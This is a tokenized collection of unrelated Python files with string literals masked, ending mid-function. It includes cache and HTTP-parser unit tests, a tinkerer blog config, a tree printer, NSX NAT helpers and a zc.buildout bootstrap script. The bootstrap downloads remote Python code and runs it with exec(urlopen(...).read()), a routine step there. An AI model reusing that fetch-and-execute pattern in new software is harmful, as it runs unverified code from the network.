<EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT:foo>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) ) <EOL> def test_expire_namespace ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( self . c . expire_namespace ( '<STR_LIT:foo>' ) , ( <NUM_LIT:3> , <NUM_LIT:2> ) ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) <EOL> self . assertTrue ( self . c . 
isexpired ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( self . c . isexpired ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> self . c . flush ( ) <EOL> def test_mget ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:a>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:a>" ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_mget_nonexistant_key ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:b>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:b>" ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_mget_expiry ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:c>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" , expire = <NUM_LIT:1> ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:c>" ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def test_mget_json ( self ) : <EOL> payload_a1 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> payload_a2 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . c . store_json ( "<STR_LIT>" , payload_a1 ) <EOL> self . c . store_json ( "<STR_LIT>" , payload_a2 ) <EOL> d = self . c . mget_json ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , payload_a1 ) <EOL> self . 
assertEqual ( d [ "<STR_LIT>" ] , payload_a2 ) <EOL> def test_mget_json_nonexistant_key ( self ) : <EOL> payload_b1 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> payload_b3 = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . c . store_json ( "<STR_LIT>" , payload_b1 ) <EOL> self . c . store_json ( "<STR_LIT>" , payload_b3 ) <EOL> d = self . c . mget_json ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , payload_b1 ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , payload_b3 ) <EOL> def test_invalidate_key ( self ) : <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT:d>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . invalidate ( "<STR_LIT>" ) <EOL> d = self . c . mget ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT:d>" ) <EOL> self . assertTrue ( "<STR_LIT>" not in d ) <EOL> self . assertEqual ( d [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> def tearDown ( self ) : <EOL> self . c . flush ( ) <EOL> main ( ) </s>
<s> import gc <EOL> import unittest <EOL> import unittest . mock <EOL> import asyncio <EOL> import asyncio . test_utils <EOL> from vase . http import ( <EOL> HttpRequest , <EOL> HttpParser , <EOL> HttpWriter , <EOL> BadRequestException , <EOL> _FORM_URLENCODED , <EOL> ) <EOL> from vase . util import MultiDict <EOL> class RequestTests ( unittest . TestCase ) : <EOL> def _get_request ( self ) : <EOL> request = HttpRequest ( <EOL> method = "<STR_LIT:GET>" , <EOL> uri = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> extra = { '<STR_LIT>' : ( '<STR_LIT:127.0.0.1>' , '<STR_LIT>' ) } <EOL> ) <EOL> request . add_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> request . add_header ( '<STR_LIT>' , _FORM_URLENCODED ) <EOL> return request <EOL> def test_request ( self ) : <EOL> req = self . _get_request ( ) <EOL> self . assertEqual ( req . GET , MultiDict ( foo = [ '<STR_LIT:bar>' ] , baz = [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( req . GET , MultiDict ( foo = [ '<STR_LIT:bar>' ] , baz = [ '<STR_LIT>' ] ) ) <EOL> def test_has_form ( self ) : <EOL> req = self . _get_request ( ) <EOL> self . assertTrue ( req . _has_form ( ) ) <EOL> req . replace_header ( '<STR_LIT>' , '<STR_LIT:application/json>' ) <EOL> self . assertFalse ( req . _has_form ( ) ) <EOL> def test_cookies ( self ) : <EOL> req = self . _get_request ( ) <EOL> self . assertEqual ( req . COOKIES , { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( req . COOKIES , { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_maybe_init_post ( self ) : <EOL> req = self . _get_request ( ) <EOL> loop = asyncio . new_event_loop ( ) <EOL> stream = asyncio . StreamReader ( loop = loop ) <EOL> data = b'<STR_LIT>' <EOL> req . add_header ( '<STR_LIT>' , str ( len ( data ) ) ) <EOL> req . body = stream <EOL> task = asyncio . Task ( req . _maybe_init_post ( ) , loop = loop ) <EOL> def feed ( ) : <EOL> stream . feed_data ( b'<STR_LIT>' ) <EOL> stream . 
feed_eof ( ) <EOL> loop . call_soon ( feed ) <EOL> loop . run_until_complete ( task ) <EOL> self . assertEqual ( req . POST , MultiDict ( foo = [ '<STR_LIT:bar>' ] , baz = [ '<STR_LIT>' ] ) ) <EOL> req = self . _get_request ( ) <EOL> stream . _eof = False <EOL> task = asyncio . Task ( req . _maybe_init_post ( ) , loop = loop ) <EOL> def feed ( ) : <EOL> stream . feed_data ( b'<STR_LIT>' ) <EOL> stream . feed_eof ( ) <EOL> loop . call_soon ( feed ) <EOL> loop . run_until_complete ( task ) <EOL> req . replace_header ( '<STR_LIT>' , '<STR_LIT:application/json>' ) <EOL> req . body = stream <EOL> stream . _eof = False <EOL> task = asyncio . Task ( req . _maybe_init_post ( ) , loop = loop ) <EOL> loop . call_soon ( feed ) <EOL> loop . run_until_complete ( task ) <EOL> self . assertEqual ( req . POST , MultiDict ( ) ) <EOL> class HttpParserTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . loop = asyncio . new_event_loop ( ) <EOL> asyncio . set_event_loop ( None ) <EOL> def tearDown ( self ) : <EOL> asyncio . test_utils . run_briefly ( self . loop ) <EOL> self . loop . close ( ) <EOL> gc . collect ( ) <EOL> def test_eof ( self ) : <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_eof ( ) ) <EOL> req = self . loop . run_until_complete ( task ) <EOL> self . assertIs ( req , None ) <EOL> req = self . loop . run_until_complete ( task ) <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> def feed ( ) : <EOL> stream . feed_data ( b'<STR_LIT>' ) <EOL> stream . feed_eof ( ) <EOL> self . loop . call_soon ( feed ) <EOL> req = self . loop . 
run_until_complete ( task ) <EOL> self . assertIs ( req , None ) <EOL> def test_bad_version ( self ) : <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( b'<STR_LIT>' ) ) <EOL> self . assertRaises ( BadRequestException , self . loop . run_until_complete , task ) <EOL> def test_headers ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> self . assertEqual ( result . method , '<STR_LIT:GET>' ) <EOL> self . assertEqual ( result . path , '<STR_LIT:/>' ) <EOL> self . assertEqual ( result . version , '<STR_LIT>' ) <EOL> self . assertEqual ( result . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_multiline_headers ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> self . assertEqual ( result . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( result . get ( '<STR_LIT:Content-Type>' ) , '<STR_LIT>' ) <EOL> def test_invalid_headers ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . 
get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> self . assertRaises ( BadRequestException , self . loop . run_until_complete , task ) <EOL> def test_no_body ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> body = self . loop . run_until_complete ( asyncio . Task ( result . body . read ( ) , loop = self . loop ) ) <EOL> self . assertEqual ( body , b'<STR_LIT>' ) <EOL> def test_with_body ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> body = self . loop . run_until_complete ( asyncio . Task ( result . body . read ( ) , loop = self . loop ) ) <EOL> self . assertEqual ( body , b'<STR_LIT>' ) <EOL> def test_with_invalid_content_length ( self ) : <EOL> req = b'<STR_LIT>' <EOL> transport = unittest . mock . Mock ( ) <EOL> transport . get_extra_info . 
return_value = ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:1> ) <EOL> stream = asyncio . StreamReader ( loop = self . loop ) <EOL> stream . set_transport ( transport ) <EOL> task = asyncio . Task ( HttpParser . parse ( stream ) , loop = self . loop ) <EOL> self . loop . call_soon ( lambda : stream . feed_data ( req ) ) <EOL> result = self . loop . run_until_complete ( task ) <EOL> body = self . loop . run_until_complete ( asyncio . Task ( result . body . read ( ) , loop = self . loop ) ) <EOL> self . assertEqual ( body , b'<STR_LIT>' ) <EOL> class HttpWriterTests ( unittest . TestCase ) : <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_status ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . status = <NUM_LIT:200> <EOL> self . assertFalse ( writer . _headers_sent ) <EOL> writer . flush ( ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> write_method . assert_called_with ( b'<STR_LIT>' ) <EOL> def test_write_header_raises_when_headers_sent ( self ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . _headers_sent = True <EOL> self . assertRaises ( AssertionError , writer . __setitem__ , '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_header ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . status = <NUM_LIT:200> <EOL> writer [ '<STR_LIT:foo>' ] = '<STR_LIT:bar>' <EOL> writer . flush ( ) <EOL> write_method . assert_called_with ( b'<STR_LIT>' ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_headers ( self , write_header_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . add_headers ( ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) ) <EOL> write_header_method . 
assert_called_with ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> def test_status_written ( self ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> self . assertFalse ( writer . _headers_sent ) <EOL> writer . _status_written = self . _headers_sent = True <EOL> writer . restore ( ) <EOL> self . assertFalse ( writer . _headers_sent ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_maybe_finalize_headers ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . _maybe_send_headers ( ) <EOL> write_method . assert_called_with ( b'<STR_LIT>' ) <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . _headers_sent = True <EOL> writer . _maybe_send_headers ( ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> @ unittest . mock . patch . object ( HttpWriter , '<STR_LIT>' ) <EOL> def test_write_body ( self , write_method ) : <EOL> writer = HttpWriter ( None , None , None , None ) <EOL> writer . write_body ( b'<STR_LIT:hello>' ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> write_method . assert_called_with ( b'<STR_LIT:hello>' ) <EOL> def test_writelines ( self ) : <EOL> mtransport = unittest . mock . MagicMock ( ) <EOL> writer = HttpWriter ( mtransport , None , None , None ) <EOL> writer . writelines ( ( b'<STR_LIT>' , ) ) <EOL> self . assertTrue ( writer . _headers_sent ) <EOL> mtransport . writelines . assert_called_with ( ( b'<STR_LIT>' , ) ) </s>
<s> import tinkerer <EOL> import tinkerer . paths <EOL> project = '<STR_LIT>' <EOL> tagline = '<STR_LIT>' <EOL> description = '<STR_LIT>' <EOL> author = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' + author <EOL> website = '<STR_LIT>' <EOL> disqus_shortname = '<STR_LIT>' <EOL> html_favicon = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> rss_service = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' , tinkerer . paths . static ] <EOL> html_theme_path = [ tinkerer . paths . themes ] <EOL> exclude_patterns = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> doc_sidebar = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> html_sidebars = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> } <EOL> source_suffix = tinkerer . source_suffix <EOL> master_doc = tinkerer . master_doc <EOL> version = tinkerer . __version__ <EOL> release = tinkerer . __version__ <EOL> html_title = project <EOL> html_use_index = False <EOL> html_show_sourcelink = False <EOL> html_add_permalinks = None </s>
<s> '''<STR_LIT>''' <EOL> import datetime <EOL> import os <EOL> from tinkerer import post <EOL> from tinkerer . ext import disqus <EOL> from tinkertest import utils <EOL> class TestDisqus ( utils . BaseTinkererTest ) : <EOL> def test_disqus ( self ) : <EOL> TEST_SHORTNAME = "<STR_LIT>" <EOL> utils . update_conf ( <EOL> { "<STR_LIT>" : <EOL> '<STR_LIT>' % TEST_SHORTNAME } ) <EOL> post . create ( "<STR_LIT>" , datetime . date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:1> ) ) <EOL> POST_ID = "<STR_LIT>" <EOL> POST_LINK = "<STR_LIT>" + POST_ID + "<STR_LIT>" <EOL> self . build ( ) <EOL> output = os . path . join ( utils . TEST_ROOT , <EOL> "<STR_LIT>" , "<STR_LIT:html>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> output_html = open ( output , "<STR_LIT:r>" ) . read ( ) <EOL> self . assertTrue ( <EOL> disqus . create_thread ( TEST_SHORTNAME , POST_ID ) in output_html ) <EOL> output = os . path . join ( utils . TEST_ROOT , <EOL> "<STR_LIT>" , "<STR_LIT:html>" , "<STR_LIT>" ) <EOL> output_html = open ( output , "<STR_LIT:r>" ) . read ( ) <EOL> self . assertTrue ( <EOL> disqus . enable_count ( TEST_SHORTNAME ) in output_html ) <EOL> self . assertTrue ( <EOL> disqus . get_count ( POST_LINK , POST_ID ) in output_html ) </s>
<s> def pretty_tree ( x , kids , show ) : <EOL> """<STR_LIT>""" <EOL> ( MID , END , CONT , LAST , ROOT ) = ( u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+0020>' , u'<STR_LIT>' ) <EOL> def rec ( x , indent , sym ) : <EOL> line = indent + sym + show ( x ) <EOL> xs = kids ( x ) <EOL> if len ( xs ) == <NUM_LIT:0> : <EOL> return line <EOL> else : <EOL> if sym == MID : <EOL> next_indent = indent + CONT <EOL> elif sym == ROOT : <EOL> next_indent = indent + ROOT <EOL> else : <EOL> next_indent = indent + LAST <EOL> syms = [ MID ] * ( len ( xs ) - <NUM_LIT:1> ) + [ END ] <EOL> lines = [ rec ( x , next_indent , sym ) for x , sym in zip ( xs , syms ) ] <EOL> return u'<STR_LIT:\n>' . join ( [ line ] + lines ) <EOL> return rec ( x , u'<STR_LIT>' , ROOT ) </s>
<s> """<STR_LIT>""" <EOL> import os , shutil , sys , tempfile <EOL> from optparse import OptionParser <EOL> tmpeggs = tempfile . mkdtemp ( ) <EOL> usage = '''<STR_LIT>''' <EOL> parser = OptionParser ( usage = usage ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = '<STR_LIT>' , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" ) ) <EOL> options , args = parser . parse_args ( ) <EOL> to_reload = False <EOL> try : <EOL> import pkg_resources , setuptools <EOL> if not hasattr ( pkg_resources , '<STR_LIT>' ) : <EOL> to_reload = True <EOL> raise ImportError <EOL> except ImportError : <EOL> ez = { } <EOL> try : <EOL> from urllib . request import urlopen <EOL> except ImportError : <EOL> from urllib2 import urlopen <EOL> exec ( urlopen ( '<STR_LIT>' ) . read ( ) , ez ) <EOL> setup_args = dict ( to_dir = tmpeggs , download_delay = <NUM_LIT:0> , no_fake = True ) <EOL> ez [ '<STR_LIT>' ] ( ** setup_args ) <EOL> if to_reload : <EOL> reload ( pkg_resources ) <EOL> import pkg_resources <EOL> for path in sys . path : <EOL> if path not in pkg_resources . working_set . entries : <EOL> pkg_resources . working_set . add_entry ( path ) <EOL> ws = pkg_resources . working_set <EOL> cmd = [ sys . executable , '<STR_LIT:-c>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , tmpeggs ] <EOL> find_links = os . environ . get ( <EOL> '<STR_LIT>' , <EOL> options . find_links or <EOL> ( '<STR_LIT>' <EOL> if options . accept_buildout_test_releases else None ) <EOL> ) <EOL> if find_links : <EOL> cmd . extend ( [ '<STR_LIT>' , find_links ] ) <EOL> distribute_path = ws . 
find ( <EOL> pkg_resources . Requirement . parse ( '<STR_LIT>' ) ) . location <EOL> requirement = '<STR_LIT>' <EOL> version = options . version <EOL> if version is None and not options . accept_buildout_test_releases : <EOL> import setuptools . package_index <EOL> _final_parts = '<STR_LIT>' , '<STR_LIT>' <EOL> def _final_version ( parsed_version ) : <EOL> for part in parsed_version : <EOL> if ( part [ : <NUM_LIT:1> ] == '<STR_LIT:*>' ) and ( part not in _final_parts ) : <EOL> return False <EOL> return True <EOL> index = setuptools . package_index . PackageIndex ( <EOL> search_path = [ distribute_path ] ) <EOL> if find_links : <EOL> index . add_find_links ( ( find_links , ) ) <EOL> req = pkg_resources . Requirement . parse ( requirement ) <EOL> if index . obtain ( req ) is not None : <EOL> best = [ ] <EOL> bestv = None <EOL> for dist in index [ req . project_name ] : <EOL> distv = dist . parsed_version <EOL> if _final_version ( distv ) : <EOL> if bestv is None or distv > bestv : <EOL> best = [ dist ] <EOL> bestv = distv <EOL> elif distv == bestv : <EOL> best . append ( dist ) <EOL> if best : <EOL> best . sort ( ) <EOL> version = best [ - <NUM_LIT:1> ] . version <EOL> if version : <EOL> requirement = '<STR_LIT>' . join ( ( requirement , version ) ) <EOL> cmd . append ( requirement ) <EOL> import subprocess <EOL> if subprocess . call ( cmd , env = dict ( os . environ , PYTHONPATH = distribute_path ) ) != <NUM_LIT:0> : <EOL> raise Exception ( <EOL> "<STR_LIT>" , <EOL> repr ( cmd ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> ws . add_entry ( tmpeggs ) <EOL> ws . require ( requirement ) <EOL> import zc . buildout . buildout <EOL> if not [ a for a in args if '<STR_LIT:=>' not in a ] : <EOL> args . append ( '<STR_LIT>' ) <EOL> if options . config_file is not None : <EOL> args [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ '<STR_LIT:-c>' , options . config_file ] <EOL> zc . buildout . buildout . main ( args ) <EOL> shutil . rmtree ( tmpeggs ) </s>
<s> from tests . config import * <EOL> from nsxramlclient . client import NsxClient <EOL> __author__ = '<STR_LIT>' <EOL> def configure_nat ( session , edgeid = '<STR_LIT>' , oadd = '<STR_LIT>' , tadd = '<STR_LIT>' , oport = <NUM_LIT> , tport = <NUM_LIT> ) : <EOL> nat_spec = session . extract_resource_body_schema ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:action>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oport <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tport <EOL> create_response = session . update ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } , request_body_dict = nat_spec ) <EOL> session . view_response ( create_response ) <EOL> def append_nat ( session , edgeid = '<STR_LIT>' , oadd = '<STR_LIT>' , tadd = '<STR_LIT>' , oport = <NUM_LIT> , tport = <NUM_LIT> ) : <EOL> nat_spec = session . 
extract_resource_body_schema ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:action>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oport <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tport <EOL> create_response = session . create ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } , request_body_dict = nat_spec ) <EOL> session . view_response ( create_response ) <EOL> def update_nat ( session , rule_id , edgeid = '<STR_LIT>' , oadd = '<STR_LIT>' , tadd = '<STR_LIT>' , oport = <NUM_LIT> , tport = <NUM_LIT> ) : <EOL> nat_spec = session . extract_resource_body_schema ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT:action>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oport <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tport <EOL> create_response = session . 
